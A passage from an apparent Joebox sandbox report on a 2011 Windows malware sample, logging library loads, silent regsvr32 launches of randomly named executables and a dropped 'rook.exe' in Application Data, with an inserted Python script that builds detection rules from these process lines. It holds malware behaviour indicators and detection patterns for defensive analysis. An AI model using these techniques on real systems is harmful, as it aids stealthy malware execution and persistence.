Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2576369364
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2576394018
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2576412405
Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2576421842
Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 2576423311
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2576448454
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2576474417
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2576476937
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2576481277
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1010000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2576709763
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2576782394
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2576788256
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2576800436
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2576803242
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2576805448
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2576953558
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2577203401
Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 2577565463
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2578280313
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid success or wait 2578329209
Section loaded Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid object name exists 2578578575
Section loaded Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 8C0000 Size: 262144 Protection: read write Mapped to pid: own pid success or wait 2578585311
Section loaded Path: \KnownDlls\0.7663042396006076.exe Access: write and read and execute Type: unknown Baseaddress: 8C0000 Size: 262144 Protection: read write Mapped to pid: own pid object name not found 2578589287
Section loaded Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Access: query and write and read and execute Type: image Baseaddress: 1010000 Size: 38506496 Protection: read write Mapped to pid: own pid conflicting addresses 2578591574
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 508 HWNDs: 1, 90378, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2578652356
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 508 HWNDs: 1, 90378, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2578654141
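The process-creation records on this page (rook.exe started from Application Data as PID 488, cmd.exe /c on a .bat in Temp as PID 2152, and the "regsvr32 -s <random>.exe" command lines of the regsvr32 sections) are the lines a detection engineer would turn into rules. The following Python, an added example rather than anything from the Joebox report, runs three such rules over the report's own lines plus one constructed benign control line; the rule names, the directory list and the line-layout regexes are my assumptions, and the regsvr32 rule expects the unquoted single-token argument the way Joebox prints it.

```python
"""Flag the process-creation behaviour recorded in this report.

Added example, not part of the Joebox report. Rule names and regexes are my
own; the SAMPLE_LINES marked 'from report' are copied from the page, the one
marked 'constructed' is a benign control line made up for the test.
"""
import re

SAMPLE_LINES = [
    # from report: PID 580 starting its dropped copy
    r"Process created PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Cmdline: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Createflags: 0 success or wait 2599034249",
    # from report: PID 580 running the temporary batch file
    r"Process created PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Cmdline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Createflags: 0 success or wait 2667319224",
    # from report: the two regsvr32 process sections
    "Commandline: regsvr32 -s 0.7663042396006076.exe",
    "Commandline: regsvr32 -s 0.3635417184612467.exe",
    # constructed benign control line (not from the report)
    r"Process created PID: 999 Path: C:\WINDOWS\system32\notepad.exe Cmdline: notepad.exe Createflags: 0 success or wait 1",
]

_PROC_RE = re.compile(
    r"^Process created PID: (?P<pid>\S+) Path: (?P<path>.+?) "
    r"Cmdline: (?P<cmd>.+?) Createflags: "
)
_CMDLINE_RE = re.compile(r"^Commandline: (?P<cmd>.+)$")

# User-writable profile directories in the XP layout this report uses.
_PROFILE_DIRS = ("\\application data\\", "\\local settings\\temp\\", "\\temp\\")

# cmd.exe /c <something>.bat
_RE_CMD_BAT = re.compile(r"\bcmd(?:\.exe)?\s+/c\s+(?P<arg>.+\.bat)\b", re.I)
# regsvr32 [/s|-s ...] <single unquoted argument>
_RE_REGSVR = re.compile(r"\bregsvr32(?:\.exe)?\s+(?:[/-][a-z]\s+)*(?P<arg>\S+)", re.I)


def classify(cmd: str, image: str = "") -> list:
    """Return the names of the rules that fire for one command line (and image path)."""
    hits = []
    low_image = image.lower()
    if low_image.endswith(".exe") and any(d in low_image for d in _PROFILE_DIRS):
        hits.append("exe_from_user_profile_dir")
    m = _RE_CMD_BAT.search(cmd)
    if m and "\\temp\\" in m.group("arg").lower():
        hits.append("cmd_runs_temp_batch")
    m = _RE_REGSVR.search(cmd)
    if m and not m.group("arg").lower().endswith((".dll", ".ocx")):
        hits.append("regsvr32_on_non_dll")
    return hits


def scan(lines) -> list:
    """Return (line, hits) for every process line that triggers at least one rule."""
    out = []
    for line in lines:
        line = line.strip()
        m = _PROC_RE.match(line)
        if m:
            hits = classify(m.group("cmd"), m.group("path"))
        else:
            m = _CMDLINE_RE.match(line)
            if not m:
                continue
            hits = classify(m.group("cmd"))
        if hits:
            out.append((line, hits))
    return out


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LINES):
        print(", ".join(hits), "<-", line[:90])
```

Two caveats from the page itself. Both regsvr32 attempts fail to map the .exe as an image ("conflicting addresses" for one, "invalid file for section" for the other), so no DLL registration succeeded on this page; the rule still fires on the command line because that is what an endpoint sensor sees. The "buffer overflow" completion on the two DigitalProductId queries at PID 580 is the NTSTATUS STATUS_BUFFER_OVERFLOW, meaning the caller's buffer was too small (the third query succeeds); it is a normal retry pattern, not a memory-safety event, and nothing to alert on.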
+ Sections
+ General
Start time: 05:44:28
Start date: 08/12/2011
Path: C:\WINDOWS\system32\regsvr32.exe
Commandline: regsvr32 -s 0.3635417184612467.exe
Imagebase: 0x1000000
File size: 11776 bytes
MD5 hash: FBDB9D0935B9907B809B381FDDF1627F
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 1B0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 1D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 220000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 270000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 774E0000 1302528 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 280000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown 6F880000 1875968 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 3D0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 1010000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 8B0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 380000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 380000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 380000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 8B0000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit 8B0000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 8B0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 74720000 311296 own pid read write object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 8C0000 262144 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\0.3635417184612467.exe write and read and execute unknown 8C0000 262144 own pid read write object name not found 1 1001DBE
C:\Documents and Settings\Administrator\Desktop\0.3635417184612467.exe query and write and read and execute image 8C0000 262144 own pid read write invalid file for section 1 1001DBE
User Activities:
+ Window enumerated
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address
0 0 false 6CC 1, 90378, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2 1001E31
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2583556438
Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2583560552
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2583564301
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2583565672
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2583566799
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2583567565
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2583569062
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2583569437
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2583570814
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2583575055
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2583578232
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2583582267
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2583588955
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2583590212
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2583598231
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid object name not found 2583605909
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2583607709
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2583613004
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2583623809
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2583626257
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid success or wait 2583628359
Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid object name not found 2583632826
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2583634290
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2583640628
Section loaded Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 2583646762
Section loaded Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2583648217
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2583655193
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2583658216
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2583664635
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2583674197
Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2583679764
Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 2583681224
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2583689642
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2583707995
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2583710626
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2583712770
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1010000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2583866451
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2583931594
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2583934359
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2583944294
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2583947221
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2583953954
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2583989352
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2583999882
Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 2584032479
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2584146538
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid success or wait 2584149178
Section loaded Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid object name exists 2584157065
Section loaded Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 8C0000 Size: 262144 Protection: read write Mapped to pid: own pid success or wait 2584166480
Section loaded Path: \KnownDlls\0.3635417184612467.exe Access: write and read and execute Type: unknown Baseaddress: 8C0000 Size: 262144 Protection: read write Mapped to pid: own pid object name not found 2584171244
Section loaded Path: C:\Documents and Settings\Administrator\Desktop\0.3635417184612467.exe Access: query and write and read and execute Type: image Baseaddress: 8C0000 Size: 262144 Protection: read write Mapped to pid: own pid invalid file for section 2584174416
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6CC HWNDs: 1, 90378, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2584179174
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6CC HWNDs: 1, 90378, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2584179838
+ Sections
+ General
Start time: 05:44:32
Start date: 08/12/2011
Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe
Commandline: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe
Imagebase: 0x400000
File size: 257536 bytes
MD5 hash: 8EFB904B16A3F86CC163744D85AECB5F
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 411C01
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe none 257536 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 success or wait 1 411C56
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 270000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 290000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2E0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 330000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 330000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 330000 24576 own pid readonly object name not found 1
\KnownDlls\compstui.dll write and read and execute unknown 330000 24576 own pid readonly object name not found 1
C:\WINDOWS\system32\compstui.dll query and write and read and execute image 6E680000 241664 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\MSIMG32.dll write and read and execute unknown 77FE0000 69632 own pid read write object name not found 1
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\ddraw.dll write and read and execute unknown 77F60000 483328 own pid read write object name not found 1
C:\WINDOWS\system32\ddraw.dll query and write and read and execute image 73760000 307200 own pid read write success or wait 1
\KnownDlls\DCIMAN32.dll write and read and execute unknown 73760000 307200 own pid read write object name not found 1
C:\WINDOWS\system32\dciman32.dll query and write and read and execute image 73BC0000 24576 own pid read write success or wait 1
\KnownDlls\resutils.dll write and read and execute unknown 73BC0000 24576 own pid read write object name not found 1
C:\WINDOWS\system32\resutils.dll query and write and read and execute image 750B0000 73728 own pid read write success or wait 1
\KnownDlls\CLUSAPI.dll write and read and execute unknown 750B0000 73728 own pid read write object name not found 1
C:\WINDOWS\system32\clusapi.dll query and write and read and execute image 76D10000 73728 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\scarddlg.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\scarddlg.dll query and write and read and execute image 5CFE0000 90112 own pid read write success or wait 1
\KnownDlls\MFC42u.DLL write and read and execute unknown 5CFE0000 90112 own pid read write object name not found 1
C:\WINDOWS\system32\mfc42u.dll query and write and read and execute image 72830000 991232 own pid read write success or wait 1
\KnownDlls\WinSCard.dll write and read and execute unknown 72830000 991232 own pid read write object name not found 1
C:\WINDOWS\system32\winscard.dll query and write and read and execute image 723D0000 114688 own pid read write success or wait 1
\KnownDlls\WTSAPI32.dll write and read and execute unknown 723D0000 114688 own pid read write object name not found 1
C:\WINDOWS\system32\wtsapi32.dll query and write and read and execute image 76F50000 32768 own pid read write success or wait 1
\KnownDlls\WINSTA.dll write and read and execute unknown 76F50000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\winsta.dll query and write and read and execute image 76360000 65536 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown 5B860000 348160 own pid read write success or wait 1
\KnownDlls\COMCTL32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 5D090000 630784 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 28C0000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll write and read and execute commit 350000 475136 own pid execute success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll write and read and execute commit 350000 475136 own pid execute success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll query and write and read and execute image 71590000 495616 own pid read write success or wait 1
